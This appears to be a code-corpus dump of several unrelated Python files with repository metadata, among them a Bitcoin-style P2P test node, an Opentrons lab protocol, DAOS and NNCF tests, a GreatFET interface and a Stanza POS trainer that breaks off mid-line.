self.verack_received: return time.sleep(0.05) def deliver(self, conn, message): deliver_sleep = self.get_deliver_sleep_time() if deliver_sleep is not None: time.sleep(deliver_sleep) with mininode_lock: try: getattr(self, 'on_' + message.command)(conn, message) except: print "ERROR delivering %s (%s)" % (repr(message), sys.exc_info()[0]) def on_version(self, conn, message): if message.nVersion >= 209: conn.send_message(msg_verack()) conn.ver_send = min(MY_VERSION, message.nVersion) if message.nVersion < 209: conn.ver_recv = conn.ver_send def on_verack(self, conn, message): conn.ver_recv = conn.ver_send self.verack_received = True def on_inv(self, conn, message): want = msg_getdata() for i in message.inv: if i.type != 0: want.inv.append(i) if len(want.inv): conn.send_message(want) def on_addr(self, conn, message): pass def on_alert(self, conn, message): pass def on_getdata(self, conn, message): pass def on_getblocks(self, conn, message): pass def on_tx(self, conn, message): pass def on_block(self, conn, message): pass def on_getaddr(self, conn, message): pass def on_headers(self, conn, message): pass def on_getheaders(self, conn, message): pass def on_ping(self, conn, message): if conn.ver_send > BIP0031_VERSION: conn.send_message(msg_pong(message.nonce)) def on_reject(self, conn, message): pass def on_close(self, conn): pass def on_mempool(self, conn): pass def on_pong(self, conn, message): pass # More useful callbacks and functions for NodeConnCB's which have a single NodeConn class SingleNodeConnCB(NodeConnCB): def __init__(self): NodeConnCB.__init__(self) self.connection = None self.ping_counter = 1 self.last_pong = msg_pong() def add_connection(self, conn): self.connection = conn # Wrapper for the NodeConn's send_message function def send_message(self, message): self.connection.send_message(message) def on_pong(self, conn, message): self.last_pong = message # Sync up with the node def sync_with_ping(self, timeout=30): def received_pong(): return (self.last_pong.nonce == self.ping_counter) self.send_message(msg_ping(nonce=self.ping_counter)) success = wait_until(received_pong, timeout) self.ping_counter += 1 return success # The actual NodeConn class # This class provides an interface for a p2p connection to a specified node class NodeConn(asyncore.dispatcher): messagemap = { b"version": msg_version, b"verack": msg_verack, b"addr": msg_addr, b"alert": msg_alert, b"inv": msg_inv, b"getdata": msg_getdata, b"getblocks": msg_getblocks, b"tx": msg_tx, b"block": msg_block, b"getaddr": msg_getaddr, b"ping": msg_ping, b"pong": msg_pong, b"headers": msg_headers, b"getheaders": msg_getheaders, b"reject": msg_reject, b"mempool": msg_mempool, } MAGIC_BYTES = { "mainnet": b"\xbf\x0c\x6b\xbd", # mainnet "testnet3": b"\xce\xe2\xca\xff", # testnet3 "regtest": b"\xfc\xc1\xb7\xdc" # regtest } def __init__(self, dstaddr, dstport, rpc, callback, net="regtest", services=1): asyncore.dispatcher.__init__(self, map=mininode_socket_map) self.log = logging.getLogger("NodeConn(%s:%d)" % (dstaddr, dstport)) self.dstaddr = dstaddr self.dstport = dstport self.create_socket(socket.AF_INET, socket.SOCK_STREAM) self.sendbuf = b"" self.recvbuf = b"" self.ver_send = 209 self.ver_recv = 209 self.last_sent = 0 self.state = "connecting" self.network = net self.cb = callback self.disconnect = False # stuff version msg into sendbuf vt = msg_version() vt.nServices = services vt.addrTo.ip = self.dstaddr vt.addrTo.port = self.dstport vt.addrFrom.ip = "0.0.0.0" vt.addrFrom.port = 0 self.send_message(vt, True) print 'MiniNode: Connecting to GlobalMovementClub Node IP # ' + dstaddr + ':' \ + str(dstport) try: self.connect((dstaddr, dstport)) except: self.handle_close() self.rpc = rpc def show_debug_msg(self, msg): self.log.debug(msg) def handle_connect(self): self.show_debug_msg("MiniNode: Connected & Listening: \n") self.state = "connected" def handle_close(self): self.show_debug_msg("MiniNode: Closing Connection to %s:%d... " % (self.dstaddr, self.dstport)) self.state = "closed" self.recvbuf = b"" self.sendbuf = b"" try: self.close() except: pass self.cb.on_close(self) def handle_read(self): try: t = self.recv(8192) if len(t) > 0: self.recvbuf += t self.got_data() except: pass def readable(self): return True def writable(self): with mininode_lock: length = len(self.sendbuf) return (length > 0) def handle_write(self): with mininode_lock: try: sent = self.send(self.sendbuf) except: self.handle_close() return self.sendbuf = self.sendbuf[sent:] def got_data(self): try: while True: if len(self.recvbuf) < 4: return if self.recvbuf[:4] != self.MAGIC_BYTES[self.network]: raise ValueError("got garbage %s" % repr(self.recvbuf)) if self.ver_recv < 209: if len(self.recvbuf) < 4 + 12 + 4: return command = self.recvbuf[4:4+12].split(b"\x00", 1)[0] msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0] checksum = None if len(self.recvbuf) < 4 + 12 + 4 + msglen: return msg = self.recvbuf[4+12+4:4+12+4+msglen] self.recvbuf = self.recvbuf[4+12+4+msglen:] else: if len(self.recvbuf) < 4 + 12 + 4 + 4: return command = self.recvbuf[4:4+12].split(b"\x00", 1)[0] msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0] checksum = self.recvbuf[4+12+4:4+12+4+4] if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen: return msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen] th = sha256(msg) h = sha256(th) if checksum != h[:4]: raise ValueError("got bad checksum " + repr(self.recvbuf)) self.recvbuf = self.recvbuf[4+12+4+4+msglen:] if command in self.messagemap: f = BytesIO(msg) t = self.messagemap[command]() t.deserialize(f) self.got_message(t) else: self.show_debug_msg("Unknown command: '" + command + "' " + repr(msg)) except Exception as e: print 'got_data:', repr(e) def send_message(self, message, pushbuf=False): if self.state != "connected" and not pushbuf: return self.show_debug_msg("Send %s" % repr(message)) command = message.command data = message.serialize() tmsg = self.MAGIC_BYTES[self.network] tmsg += command tmsg += b"\x00" * (12 - len(command)) tmsg += struct.pack("<I", len(data)) if self.ver_send >= 209: th = sha256(data) h = sha256(th) tmsg += h[:4] tmsg += data with mininode_lock: self.sendbuf += tmsg self.last_sent = time.time() def got_message(self, message): if message.command == b"version": if message.nVersion <= BIP0031_VERSION: self.messagemap[b'ping'] = msg_ping_prebip31 if self.last_sent + 30 * 60 < time.time(): self.send_message(self.messagemap[b'ping']()) self.show_debug_msg("Recv %s" % repr(message)) self.cb.deliver(self, message) def disconnect_node(self): self.disconnect = True class NetworkThread(Thread): def run(self): while mininode_socket_map: # We check for whether to disconnect outside of the asyncore # loop to workaround the behavior of asyncore when using # select disconnected = [] for fd, obj in mininode_socket_map.items(): if obj.disconnect: disconnected.append(obj) [ obj.handle_close() for obj in disconnected ] asyncore.loop(0.1, use_poll=True, map=mininode_socket_map, count=1) # An exception we can raise if we detect a potential disconnect # (p2p or rpc) before the test is complete class EarlyDisconnectError(Exception): def __init__(self, value): self.value = value def __str__(self): return repr(self.value)
29.240658
184
0.571235
36ccdfc9408f44a83650f8df3b4de8eac6b8533c
302
py
Python
itertools_accumulate.py
DahlitzFlorian/article-introduction-to-itertools-snippets
07803f568e8e11c96a42c140b1aca8fcbf71c93e
[ "MIT" ]
3
2020-03-12T21:42:59.000Z
2020-03-18T02:42:22.000Z
itertools_accumulate.py
DahlitzFlorian/article-introduction-to-itertools-snippets
07803f568e8e11c96a42c140b1aca8fcbf71c93e
[ "MIT" ]
null
null
null
itertools_accumulate.py
DahlitzFlorian/article-introduction-to-itertools-snippets
07803f568e8e11c96a42c140b1aca8fcbf71c93e
[ "MIT" ]
null
null
null
from itertools import accumulate from operator import mul numbers = [1, 2, 3, 4, 5] result1 = accumulate(numbers) result2 = accumulate(numbers, mul) result3 = accumulate(numbers, initial=100) print(f"Result 1: {list(result1)}") print(f"Result 2: {list(result2)}") print(f"Result 3: {list(result3)}")
25.166667
42
0.725166
24bb4aa9ecdf5bd8a9e89ffd359137a9805b77c9
11,926
py
Python
SARS CoV-2/INATIVOS/Extração MagMax COVID - STARLAB.py
biogerm-pt/OT-2
fed24f06db0ee19216a1f793482f588f07e3762a
[ "Apache-2.0" ]
null
null
null
SARS CoV-2/INATIVOS/Extração MagMax COVID - STARLAB.py
biogerm-pt/OT-2
fed24f06db0ee19216a1f793482f588f07e3762a
[ "Apache-2.0" ]
null
null
null
SARS CoV-2/INATIVOS/Extração MagMax COVID - STARLAB.py
biogerm-pt/OT-2
fed24f06db0ee19216a1f793482f588f07e3762a
[ "Apache-2.0" ]
null
null
null
from opentrons.types import Point import json import os import math import threading from time import sleep metadata = { 'protocolName': 'USO_v6_station_b_M300_Pool_magmax', 'author': 'Nick <ndiehl@opentrons.com', 'apiLevel': '2.3' } NUM_SAMPLES = 96 # start with 8 samples, slowly increase to 48, then 94 (max is 64) ELUTION_VOL = 50 STARTING_VOL = 540 WASH_VOL = 500 POOL = False TIP_TRACK = False PARK = True # Definitions for deck light flashing class CancellationToken: def __init__(self): self.is_continued = False def set_true(self): self.is_continued = True def set_false(self): self.is_continued = False def turn_on_blinking_notification(hardware, pause): while pause.is_continued: hardware.set_lights(rails=True) sleep(1) hardware.set_lights(rails=False) sleep(1) def create_thread(ctx, cancel_token): t1 = threading.Thread(target=turn_on_blinking_notification, args=(ctx._hw_manager.hardware, cancel_token)) t1.start() return t1 # Start protocol def run(ctx): # Setup for flashing lights notification to empty trash # cancellationToken = CancellationToken() # load labware and pipettes num_cols = math.ceil(NUM_SAMPLES/8) tips300 = [ctx.load_labware('starlab_96_tiprack_300ul', slot, '200µl filtertiprack') for slot in ['3', '6', '8', '9', '7']] if PARK: parkingrack = ctx.load_labware( 'starlab_96_tiprack_300ul', '10', 'empty tiprack for parking') if POOL: parking_spots = parkingrack.rows()[0] else: parking_spots = parkingrack.rows()[0][:num_cols] else: tips300.insert(0, ctx.load_labware('starlab_96_tiprack_300ul', '10', '200µl filtertiprack')) parking_spots = [None for none in range(12)] m300 = ctx.load_instrument( 'p300_multi_gen2', 'left', tip_racks=tips300) magdeck = ctx.load_module('magnetic module gen2', '4') magdeck.disengage() magheight = 6.5 magplate = magdeck.load_labware('nest_96_wellplate_2ml_deep') # magplate = magdeck.load_labware('biorad_96_wellplate_200ul_pcr') tempdeck = ctx.load_module('Temperature Module Gen2', '1') flatplate = tempdeck.load_labware( 'opentrons_96_aluminumblock_nest_wellplate_100ul',) waste = ctx.load_labware('nest_1_reservoir_195ml', '11', 'Liquid Waste').wells()[0].top() etoh = ctx.load_labware( 'nest_1_reservoir_195ml', '2', 'EtOH reservoir').wells()[0:] res1 = ctx.load_labware( 'nest_12_reservoir_15ml', '5', 'reagent reservoir 1') wash1 = res1.wells()[:4] elution_solution = res1.wells()[-1] if POOL: mag_samples_m = magplate.rows()[0][:num_cols] + magplate.rows()[0][8:8+math.ceil(num_cols/2)] elution_samples_m = flatplate.rows()[0][:num_cols] + flatplate.rows()[0][8:8+math.ceil(num_cols/2)] else: mag_samples_m = magplate.rows()[0][:num_cols] elution_samples_m = flatplate.rows()[0][:num_cols] magdeck.disengage() # just in case #tempdeck.set_temperature(20) m300.flow_rate.aspirate = 50 m300.flow_rate.dispense = 150 m300.flow_rate.blow_out = 300 folder_path = '/data/B' tip_file_path = folder_path + '/tip_log.json' tip_log = {'count': {}} if TIP_TRACK and not ctx.is_simulating(): if os.path.isfile(tip_file_path): with open(tip_file_path) as json_file: data = json.load(json_file) if 'tips300' in data: tip_log['count'][m300] = data['tips300'] else: tip_log['count'][m300] = 0 else: tip_log['count'][m300] = 0 else: tip_log['count'] = {m300: 0} tip_log['tips'] = { m300: [tip for rack in tips300 for tip in rack.rows()[0]]} tip_log['max'] = {m300: len(tip_log['tips'][m300])} def pick_up(pip, loc=None): nonlocal tip_log if tip_log['count'][pip] == tip_log['max'][pip] and not loc: ctx.pause('Replace ' + str(pip.max_volume) + 'µl tipracks before \ resuming.') pip.reset_tipracks() tip_log['count'][pip] = 0 if loc: pip.pick_up_tip(loc) else: pip.pick_up_tip(tip_log['tips'][pip][tip_log['count'][pip]]) tip_log['count'][pip] += 1 switch = True drop_count = 0 drop_threshold = 240 # number of tips trash will accommodate before prompting user to empty def drop(pip): nonlocal switch nonlocal drop_count side = 30 if switch else -18 drop_loc = ctx.loaded_labwares[12].wells()[0].top().move( Point(x=side)) pip.drop_tip(drop_loc) switch = not switch drop_count += 8 if drop_count == drop_threshold: # Setup for flashing lights notification to empty trash # if not ctx._hw_manager.hardware.is_simulator: # cancellationToken.set_true() # thread = create_thread(ctx, cancellationToken) m300.home() ctx.pause('Please empty tips from waste before resuming.') ctx.home() # home before continuing with protocol # cancellationToken.set_false() # stop light flashing after home # thread.join() drop_count = 0 waste_vol = 0 waste_threshold = 185000 def remove_supernatant(vol, park=False): def waste_track(vol): nonlocal waste_vol if waste_vol + vol >= waste_threshold: # Setup for flashing lights notification to empty liquid waste # if not ctx._hw_manager.hardware.is_simulator: # cancellationToken.set_true() # thread = create_thread(ctx, cancellationToken) m300.home() ctx.pause('Please empty liquid waste (slot 11) before resuming.') ctx.home() # home before continuing with protocol # cancellationToken.set_false() # stop light flashing after home # thread.join() waste_vol = 0 waste_vol += vol m300.flow_rate.aspirate = 30 num_trans = math.ceil(vol/200) vol_per_trans = vol/num_trans for m, spot in zip(mag_samples_m, parking_spots): if park: pick_up(m300, spot) else: pick_up(m300) side_ind = int(m.display_name.split(' ')[0][1:]) side = 1 if side_ind % 2 == 0 else -1 loc = m.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5 for _ in range(num_trans): waste_track(vol_per_trans) if m300.current_volume > 0: m300.dispense(m300.current_volume, m.top()) # void air gap if necessary m300.move_to(m.center()) m300.transfer(vol_per_trans, loc, waste, new_tip='never', air_gap=10) #m300.blow_out(waste) m300.air_gap(10) drop(m300) m300.flow_rate.aspirate = 50 # mudei de 150 def wash(wash_vol, source, mix_reps, park=True): magdeck.disengage() num_trans = math.ceil(wash_vol/200) vol_per_trans = wash_vol/num_trans wash_vol_rem = wash_vol for i, (m, spot) in enumerate(zip(mag_samples_m, parking_spots)): side_ind = int(m.display_name.split(' ')[0][1:]) side = -1 if side_ind % 2 == 0 else 1 pick_up(m300) loc = m.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5 src = source[i//(12//len(source))] for n in range(num_trans): if m300.current_volume > 0: m300.dispense(m300.current_volume, src.top()) m300.transfer(vol_per_trans, src.bottom(0.8), m.top(), air_gap=20, new_tip='never') if n < num_trans - 1: # only air_gap if going back to source m300.air_gap(20) m300.mix(mix_reps, 150, loc) m300.blow_out(m.top()) m300.air_gap(20) if park: m300.drop_tip(spot) else: drop(m300) magdeck.engage(height=magheight) ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.') remove_supernatant(wash_vol_rem+40, park=park) #+40 def wash_etoh(wash_etoh_vol, source_etoh, mix_reps_etoh, park=True): magdeck.disengage() num_trans = math.ceil(wash_etoh_vol/200) vol_per_trans = wash_etoh_vol/num_trans for i, (m, spot) in enumerate(zip(mag_samples_m, parking_spots)): side_ind = int(m.display_name.split(' ')[0][1:]) side = -1 if side_ind % 2 == 0 else 1 pick_up(m300) loc = m.bottom(0.5).move(Point(x=side*2.5)) # mudei de 0.5 3>2.5 src = source_etoh[i//(12//len(source_etoh))] for n in range(num_trans): if m300.current_volume > 0: m300.dispense(m300.current_volume, src.top()) m300.transfer(vol_per_trans, src.bottom(0.8), m.top(), air_gap=20, new_tip='never') if n < num_trans - 1: # only air_gap if going back to source_etoh m300.air_gap(20) m300.mix(mix_reps_etoh, 150, loc) m300.blow_out(m.top()) m300.air_gap(20) if park: m300.drop_tip(spot) else: drop(m300) magdeck.engage(height=magheight) ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.') remove_supernatant(wash_etoh_vol+40, park=park) #+40 def elute(vol, park=True): # resuspend beads in elution for m, spot in zip(mag_samples_m, parking_spots): side_ind = int(m.display_name.split(' ')[0][1:]) side = -1 if side_ind % 2 == 0 else 1 pick_up(m300) loc = m.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5 m300.aspirate(vol, elution_solution) m300.move_to(m.center()) m300.dispense(vol, loc) m300.mix(10, 0.8*vol, loc) m300.blow_out(m.bottom(5)) m300.air_gap(20) if park: m300.drop_tip(spot) else: drop(m300) ctx.delay(minutes=5, msg='Incubating off magnet at room temperature \ for 5 minutes') magdeck.engage(height=magheight) ctx.delay(minutes=5, msg='Incubating on magnet at room temperature \ for 5 minutes') for m, e, spot in zip(mag_samples_m, elution_samples_m, parking_spots): if park: pick_up(m300, spot) else: pick_up(m300) side_ind = int(m.display_name.split(' ')[0][1:]) side = 1 if side_ind % 2 == 0 else -1 loc = m.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5 m300.transfer(40, loc, e.bottom(5), air_gap=20, new_tip='never') m300.blow_out(e.top(-2)) m300.air_gap(20) m300.drop_tip() magdeck.engage(height=magheight) ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.') # remove initial supernatant m300.flow_rate.aspirate = 50 remove_supernatant(STARTING_VOL, park=PARK) wash(WASH_VOL, wash1, 15, park=PARK) #m300.flow_rate.aspirate = 94 wash_etoh(WASH_VOL, etoh, 15, park=PARK) wash_etoh(WASH_VOL, etoh, 15, park=PARK) magdeck.disengage() ctx.delay(minutes=5, msg='Airdrying beads at room temperature for 5 \ minutes.') m300.flow_rate.aspirate = 50 elute(ELUTION_VOL, park=PARK)
36.808642
110
0.582425
0177fcebd2550e61c6175ef81214f68f254fa7f3
6,740
py
Python
src/tests/ftest/container/Open.py
JohnMalmberg/daos
81a0e41a538aee4b998ec5101a66bb2b3ddecb6a
[ "Apache-2.0" ]
null
null
null
src/tests/ftest/container/Open.py
JohnMalmberg/daos
81a0e41a538aee4b998ec5101a66bb2b3ddecb6a
[ "Apache-2.0" ]
1
2018-10-22T17:06:02.000Z
2018-10-29T05:08:00.000Z
src/tests/ftest/container/Open.py
JohnMalmberg/daos
81a0e41a538aee4b998ec5101a66bb2b3ddecb6a
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python ''' (C) Copyright 2018 Intel Corporation. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE The Government's rights to use, modify, reproduce, release, perform, display, or disclose this software are subject to the terms of the Apache License as provided in Contract No. B609815. Any reproduction of computer software, computer software documentation, or portions thereof marked with this legend must also reproduce the markings. ''' import os import time import traceback import sys import json import uuid from avocado import Test from avocado import main from avocado.utils import process sys.path.append('./util') sys.path.append('../util') sys.path.append('../../../utils/py') sys.path.append('./../../utils/py') import ServerUtils import WriteHostFile from daos_api import DaosContext from daos_api import DaosPool from daos_api import DaosContainer from daos_api import RankList class OpenContainerTest(Test): """ Tests DAOS container bad create (non existing pool handle, bad uuid) and close. :avocado: tags=container,containeropen """ def setUp(self): # get paths from the build_vars generated by build with open('../../../.build_vars.json') as f: build_paths = json.load(f) self.basepath = os.path.normpath(build_paths['PREFIX'] + "/../") self.tmp = build_paths['PREFIX'] + '/tmp' self.server_group = self.params.get("server_group",'/server/', 'daos_server') # setup the DAOS python API self.Context = DaosContext(build_paths['PREFIX'] + '/lib/') self.POOL1 = None self.POOL2 = None self.CONTAINER1 = None self.CONTAINER2 = None self.hostfile = None self.hostlist = self.params.get("test_machines",'/run/hosts/*') self.hostfile = WriteHostFile.WriteHostFile(self.hostlist, self.tmp) # common parameters used in pool create self.createmode = self.params.get("mode",'/run/createtests/createmode/') self.createsetid = self.params.get("setname",'/run/createtests/createset/') self.createsize = self.params.get("size",'/run/createtests/createsize/') # POOL 1 UID GID self.createuid1 = self.params.get("uid",'/run/createtests/createuid1/') self.creategid1 = self.params.get("gid",'/run/createtests/creategid1/') # POOL 2 UID GID self.createuid2 = self.params.get("uid",'/run/createtests/createuid2/') self.creategid2 = self.params.get("gid",'/run/createtests/creategid2/') ServerUtils.runServer(self.hostfile, self.server_group, self.basepath) # give it time to start time.sleep(2) def tearDown(self): if self.CONTAINER1 is not None: self.CONTAINER1.destroy(); if self.CONTAINER2 is not None: self.CONTAINER2.destroy(); if self.POOL1 is not None and self.POOL1.attached: self.POOL1.destroy(1) if self.POOL2 is not None and self.POOL2.attached: self.POOL2.destroy(1) ServerUtils.stopServer() def test_container_open(self): """ Test basic container bad create. :avocado: tags=container,containeropen """ expected_for_param = [] uuidlist = self.params.get("uuid",'/run/createtests/uuids/*/') containerUUID = uuidlist[0] expected_for_param.append(uuidlist[1]) pohlist = self.params.get("poh",'/run/createtests/handles/*/') poh = pohlist[0] expected_for_param.append(pohlist[1]) expected_result = 'PASS' for result in expected_for_param: if result == 'FAIL': expected_result = 'FAIL' break try: # create two pools and try to create containers in these pools self.POOL1 = DaosPool(self.Context) self.POOL1.create(self.createmode, self.createuid1, self.creategid1, self.createsize, self.createsetid, None) self.POOL2 = DaosPool(self.Context) self.POOL2.create(self.createmode, self.createuid2, self.creategid2, self.createsize, None, None) # Connect to the pools self.POOL1.connect(1 << 1) self.POOL2.connect(1 << 1) # defines pool handle for container open if pohlist[0] == 'POOL1': poh = self.POOL1.handle else: poh = self.POOL2.handle # Create a container in POOL1 self.CONTAINER1 = DaosContainer(self.Context) self.CONTAINER1.create(self.POOL1.handle) # defines test UUID for container open if uuidlist[0] == 'POOL1': struuid = self.CONTAINER1.get_uuid_str() containerUUID = uuid.UUID(struuid) else: if uuidlist[0] == 'MFUUID': containerUUID = "misformed-uuid-0000" else: containerUUID = uuid.uuid4() # random uuid # tries to open the container1 # open should be ok only if poh = POOL1.handle && containerUUID = CONTAINER1.uuid self.CONTAINER1.open(poh, containerUUID) # wait a few seconds and then destroy containers time.sleep(5) self.CONTAINER1.close() self.CONTAINER1.destroy() self.CONTAINER1 = None # cleanup the pools self.POOL1.disconnect() self.POOL1.destroy(1) self.POOL1 = None self.POOL2.disconnect() self.POOL2.destroy(1) self.POOL2 = None if expected_result in ['FAIL']: self.fail("Test was expected to fail but it passed.\n") except Exception as e: print e print traceback.format_exc() if expected_result == 'PASS': self.fail("Test was expected to pass but it failed.\n") finally: if self.hostfile is not None: os.remove(self.hostfile) if __name__ == "__main__": main()
34.742268
93
0.617062
4157d0fb6b97e8d4648b6a9527374ba6e8e43f4a
1,097
py
Python
host/greatfet/interfaces/sdir.py
hewittc/greatfet
9e9dfb9c0af476457d41731d5bfe483f8928a49d
[ "BSD-3-Clause" ]
2
2019-11-07T01:09:14.000Z
2020-10-31T06:10:49.000Z
host/greatfet/interfaces/sdir.py
hewittc/greatfet
9e9dfb9c0af476457d41731d5bfe483f8928a49d
[ "BSD-3-Clause" ]
null
null
null
host/greatfet/interfaces/sdir.py
hewittc/greatfet
9e9dfb9c0af476457d41731d5bfe483f8928a49d
[ "BSD-3-Clause" ]
1
2021-06-26T06:05:10.000Z
2021-06-26T06:05:10.000Z
# # This file is part of GreatFET # import array import usb from ..interface import GreatFETInterface from greatfet.protocol import vendor_requests class SDIRTransceiver(GreatFETInterface): """ Data source for scanning out software-defined IR data. """ USB_TIMEOUT_ERRNO = 110 def __init__(self, board): self.board = board self.api = board.apis.sdir self.running = False def start_receive(self): self.api.start_receive() self.running = True def stop(self): self.api.stop() self.running = False def read(self, timeout=1000, max_data=0x4000, autostart=False, allow_timeout=False): """ Reads all available samples from the GreatFET. """ if not self.running and autostart: self.start_receive() try: return self.board.comms.device.read(0x81, max_data, timeout=timeout) except usb.core.USBError as e: if (e.errno == self.USB_TIMEOUT_ERRNO) and allow_timeout: return None else: raise
21.94
88
0.62443
74fddb0ba016fed5f282df528360621ea913a9b1
3,216
py
Python
tests/test_extensions_build.py
l-bat/nncf
6258916cd5fa7fc010ad09da63113354358bffd8
[ "Apache-2.0" ]
null
null
null
tests/test_extensions_build.py
l-bat/nncf
6258916cd5fa7fc010ad09da63113354358bffd8
[ "Apache-2.0" ]
null
null
null
tests/test_extensions_build.py
l-bat/nncf
6258916cd5fa7fc010ad09da63113354358bffd8
[ "Apache-2.0" ]
null
null
null
import os import subprocess import pytest import pathlib import shutil import torch from tests.conftest import TEST_ROOT from tests.test_sanity_sample import Command EXTENSIONS_BUILD_FILENAME = 'extensions_build_checks.py' @pytest.mark.parametrize("venv_type, package_type,install_type", [('venv', 'develop', 'GPU')]) def test_force_cuda_build(tmp_venv_with_nncf, install_type, tmp_path, package_type): ''' Check that CUDA Extensions weren't initially built and \ then with TORCH_CUDA_ARCH_LIST were forced to be built ''' cuda_home = os.environ.get('CUDA_HOME') or os.environ.get('CUDA_PATH') if cuda_home is None: try: nvcc = subprocess.check_output(['which', 'nvcc']) cuda_home = os.path.dirname(os.path.dirname(nvcc)) except subprocess.CalledProcessError: if not cuda_home: cuda_home = '/usr/local/cuda' if not os.path.exists(cuda_home): cuda_home = None if not cuda_home and not torch.cuda.is_available(): pytest.skip('There is no CUDA on the machine. The test will be skipped') venv_path = tmp_venv_with_nncf torch_build_dir = tmp_path / 'extensions' export_env_variables = "export CUDA_VISIBLE_DEVICES='' export TORCH_EXTENSIONS_DIR={}".format(torch_build_dir) python_executable_with_venv = ". {0}/bin/activate && {1} && {0}/bin/python".format(venv_path, export_env_variables) run_path = tmp_path / 'run' shutil.copy(TEST_ROOT / EXTENSIONS_BUILD_FILENAME, run_path) torch_ext_dir = pathlib.Path(torch_build_dir) assert not torch_ext_dir.exists() mode = 'cpu' command = Command("{} {}/extensions_build_checks.py {}".format(python_executable_with_venv, run_path, mode), path=run_path) command.run() cpu_ext_dir = (torch_ext_dir / 'quantized_functions_cpu') assert cpu_ext_dir.exists() cpu_ext_so = (cpu_ext_dir / 'quantized_functions_cpu.so') assert cpu_ext_so.exists() cuda_ext_dir = (torch_ext_dir / 'quantized_functions_cuda') assert not cuda_ext_dir.exists() cuda_ext_so = (cuda_ext_dir / 'quantized_functions_cuda.so') assert not cuda_ext_so.exists() cpu_ext_dir = (torch_ext_dir / 'binarized_functions_cpu') assert cpu_ext_dir.exists() cpu_ext_so = (cpu_ext_dir / 'binarized_functions_cpu.so') assert cpu_ext_so.exists() cuda_ext_dir = (torch_ext_dir / 'binarized_functions_cuda') assert not cuda_ext_dir.exists() cuda_ext_so = (cuda_ext_dir / 'binarized_functions_cuda.so') assert not cuda_ext_so.exists() mode = 'cuda' command = Command("{} {}/extensions_build_checks.py {}".format(python_executable_with_venv, run_path, mode), path=run_path) command.run() cuda_ext_dir = (torch_ext_dir / 'quantized_functions_cuda') assert cuda_ext_dir.exists() cuda_ext_so = (cuda_ext_dir / 'quantized_functions_cuda.so') assert cuda_ext_so.exists() cuda_ext_dir = (torch_ext_dir / 'binarized_functions_cuda') assert cuda_ext_dir.exists() cuda_ext_so = (cuda_ext_dir / 'binarized_functions_cuda.so') assert cuda_ext_so.exists()
35.733333
119
0.699938
0f3c5e55c0beb4a6904721a5ebaac967ed98eb25
6,019
py
Python
stanza/models/pos/trainer.py
vivkvv/stanza
d30d396950c94499aa4897e2a3539ec720682253
[ "Apache-2.0" ]
null
null
null
stanza/models/pos/trainer.py
vivkvv/stanza
d30d396950c94499aa4897e2a3539ec720682253
[ "Apache-2.0" ]
null
null
null
stanza/models/pos/trainer.py
vivkvv/stanza
d30d396950c94499aa4897e2a3539ec720682253
[ "Apache-2.0" ]
null
null
null
""" A trainer class to handle training and testing of models. """ import sys import logging import torch from torch import nn from stanza.models.common.trainer import Trainer as BaseTrainer from stanza.models.common import utils, loss from stanza.models.pos.model import Tagger from stanza.models.pos.vocab import MultiVocab import onnx import onnxruntime logger = logging.getLogger('stanza') def unpack_batch(batch, use_cuda): """ Unpack a batch from the data loader. """ if use_cuda: inputs = [b.cuda() if b is not None else None for b in batch[:8]] else: inputs = batch[:8] orig_idx = batch[8] word_orig_idx = batch[9] sentlens = batch[10] wordlens = batch[11] return inputs, orig_idx, word_orig_idx, sentlens, wordlens class Trainer(BaseTrainer): """ A trainer for training models. """ def __init__(self, args=None, vocab=None, pretrain=None, model_file=None, use_cuda=False): self.use_cuda = use_cuda if model_file is not None: # load everything from file self.model_file = model_file self.load(model_file, pretrain) else: # build model from scratch self.args = args self.vocab = vocab self.model = Tagger(args, vocab, emb_matrix=pretrain.emb if pretrain is not None else None, share_hid=args['share_hid']) self.parameters = [p for p in self.model.parameters() if p.requires_grad] if self.use_cuda: self.model.cuda() else: self.model.cpu() self.optimizer = utils.get_optimizer(self.args['optim'], self.parameters, self.args['lr'], betas=(0.9, self.args['beta2']), eps=1e-6) def update(self, batch, eval=False): inputs, orig_idx, word_orig_idx, sentlens, wordlens = unpack_batch(batch, self.use_cuda) word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained = inputs if eval: self.model.eval() else: self.model.train() self.optimizer.zero_grad() loss, _ = self.model(word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained, word_orig_idx, sentlens, wordlens) loss_val = loss.data.item() if eval: return loss_val loss.backward() torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.args['max_grad_norm']) self.optimizer.step() return loss_val def predict(self, batch, unsort=True): inputs, orig_idx, word_orig_idx, sentlens, wordlens = unpack_batch(batch, self.use_cuda) word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained = inputs self.model.eval() batch_size = word.size(0) # export to onnx onnx_export_file_name = self.model_file + ".onnx" torch.onnx.export( self.model, (word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained, word_orig_idx, sentlens, wordlens), onnx_export_file_name, export_params = True, opset_version=9, do_constant_folding=True, input_names=['input'], output_names=['output'], dynamic_axes={ 'input': {0: 'batch_size'}, 'output': {0: 'batch_size'} } ) onnx_model = onnx.load(onnx_export_file_name) onnx.checker.check_model(onnx_model) _, preds = self.model(word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained, word_orig_idx, sentlens, wordlens) upos_seqs = [self.vocab['upos'].unmap(sent) for sent in preds[0].tolist()] xpos_seqs = 